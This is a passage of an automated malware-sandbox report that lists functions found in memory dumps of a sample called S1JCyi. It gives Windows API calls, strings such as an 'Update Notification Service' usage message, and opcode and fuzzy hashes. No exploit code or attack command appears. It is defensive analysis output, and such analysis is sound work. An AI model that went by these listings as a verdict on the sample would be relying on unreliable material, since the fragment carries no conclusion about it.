                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$Info
                                      • String ID:
                                      • API String ID: 1775632426-0
                                      • Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                      • Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
                                      • Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                      • Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700
                                      APIs
                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A4872EB,?,?,?,00007FFE1A483EC0,?,?,?,?,00007FFE1A483CFD), ref: 00007FFE1A4871B1
                                      • GetLastError.KERNEL32(?,?,?,00007FFE1A4872EB,?,?,?,00007FFE1A483EC0,?,?,?,?,00007FFE1A483CFD), ref: 00007FFE1A4871BF
                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A4872EB,?,?,?,00007FFE1A483EC0,?,?,?,?,00007FFE1A483CFD), ref: 00007FFE1A4871E9
                                      • FreeLibrary.KERNEL32(?,?,?,00007FFE1A4872EB,?,?,?,00007FFE1A483EC0,?,?,?,?,00007FFE1A483CFD), ref: 00007FFE1A487257
                                      • GetProcAddress.KERNEL32(?,?,?,00007FFE1A4872EB,?,?,?,00007FFE1A483EC0,?,?,?,?,00007FFE1A483CFD), ref: 00007FFE1A487263
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                      • String ID: api-ms-
                                      • API String ID: 2559590344-2084034818
                                      • Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                      • Instruction ID: fb64c8a82908c64648b1ccc9ff1771087383ea7774f2eba8ed1f1beda4df8e78
                                      • Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                      • Instruction Fuzzy Hash: 4631A321B1AE4291EE66DB87B4105796294BF49FB0F5906B6ED1D06BB0EF3CE4B58200
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Value$ErrorLast
                                      • String ID:
                                      • API String ID: 2506987500-0
                                      • Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                      • Instruction ID: 1ff470cf461e469641a01bd263b57c62d3001914d0310323583bc80f6578da07
                                      • Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                      • Instruction Fuzzy Hash: B8214C28F0CE4249FA65A7A3755213951429F48FF0F6407F7E92E47AF7EE6CA4B18240
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                      • String ID: CONOUT$
                                      • API String ID: 3230265001-3130406586
                                      • Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                      • Instruction ID: 45f4344f1ef347c1d4d4122617374164a04d88462ea678cf84d540642ca36f39
                                      • Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                      • Instruction Fuzzy Hash: 06116A21B18E4182E7708B53A84573962A0BB8CFB4F0042B6EA5E87BA4DF7CD5748744
                                      APIs
                                      • RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
                                      • CreateEventW.KERNEL32 ref: 00000001400012C0
                                        • Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
                                        • Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
                                        • Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
                                        • Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
                                        • Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
                                        • Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
                                        • Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
                                        • Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
                                        • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
                                        • Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
                                        • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
                                      • SetServiceStatus.ADVAPI32 ref: 0000000140001302
                                      • WaitForSingleObject.KERNEL32 ref: 0000000140001312
                                        • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
                                        • Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
                                        • Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
                                        • Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
                                        • Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
                                        • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
                                        • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
                                        • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
                                        • Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
                                        • Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
                                        • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
                                        • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
                                        • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
                                        • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
                                        • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
                                        • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
                                        • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6
                                      • SetServiceStatus.ADVAPI32 ref: 000000014000134B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
                                      • String ID: vseamps
                                      • API String ID: 3197017603-3944098904
                                      • Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                      • Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
                                      • Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                      • Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Messagesprintf_s
                                      • String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
                                      • API String ID: 2642950106-3610746849
                                      • Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                      • Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
                                      • Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                      • Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                      • Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
                                      • Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                      • Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                      • Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
                                      • Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                      • Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200
                                      APIs
                                      • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
                                      • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
                                      • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: StringType$ByteCharMultiWide$ErrorLast
                                      • String ID:
                                      • API String ID: 319667368-0
                                      • Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                      • Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
                                      • Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                      • Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300
                                      APIs
                                      • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
                                      • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E
                                        • Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151
                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
                                      • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
                                      • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                                      • String ID:
                                      • API String ID: 1390108997-0
                                      • Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                      • Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
                                      • Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                      • Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                      • String ID: csm$csm$csm
                                      • API String ID: 3523768491-393685449
                                      • Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                      • Instruction ID: 10e9bba69263ea203dd9937704b0f3277add070a7c2e79989e3b3e3a999deeb8
                                      • Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                      • Instruction Fuzzy Hash: 6CE1A432B08B818AE7609FB6E4402BD77A0FB45B68F1441B6DA4D5766ACF38E4E1C741
                                      APIs
                                      • GetLastError.KERNEL32(?,?,?,00007FFE1A488BC9,?,?,?,?,00007FFE1A488C14), ref: 00007FFE1A4895CB
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE1A488BC9,?,?,?,?,00007FFE1A488C14), ref: 00007FFE1A489601
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE1A488BC9,?,?,?,?,00007FFE1A488C14), ref: 00007FFE1A48962E
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE1A488BC9,?,?,?,?,00007FFE1A488C14), ref: 00007FFE1A48963F
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE1A488BC9,?,?,?,?,00007FFE1A488C14), ref: 00007FFE1A489650
                                      • SetLastError.KERNEL32(?,?,?,00007FFE1A488BC9,?,?,?,?,00007FFE1A488C14), ref: 00007FFE1A48966B
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Value$ErrorLast
                                      • String ID:
                                      • API String ID: 2506987500-0
                                      • Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                      • Instruction ID: 7b89ae4d807f3b1f6a71699e43512f6f7fb88464e3c6514aebb6cfb1d5e69dc6
                                      • Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                      • Instruction Fuzzy Hash: 55115B24B0CE4249FA6567A3755213921429F48FF0F4407F7E83E576F7DE6CA4B28200
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
                                      • String ID:
                                      • API String ID: 3326452711-0
                                      • Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                      • Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
                                      • Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                      • Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterLeaveTimerWaitable
                                      • String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
                                      • API String ID: 2984211723-1229430080
                                      • Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                      • Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
                                      • Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                      • Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                      • Instruction ID: 831704db97724e88f147f8299704783467c0b3920c53062462279aad857ca2ce
                                      • Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                      • Instruction Fuzzy Hash: B4F04F61B19E0281EA308B66A4553396320AF8DB71F5402FADA6E462F4DF3CE4B9C340
                                      APIs
                                      • GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
                                      • GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
                                      • ExitProcess.KERNEL32 ref: 0000000140008545
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: AddressExitHandleModuleProcProcess
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 75539706-1276376045
                                      • Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                      • Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
                                      • Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                      • Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: AdjustPointer
                                      • String ID:
                                      • API String ID: 1740715915-0
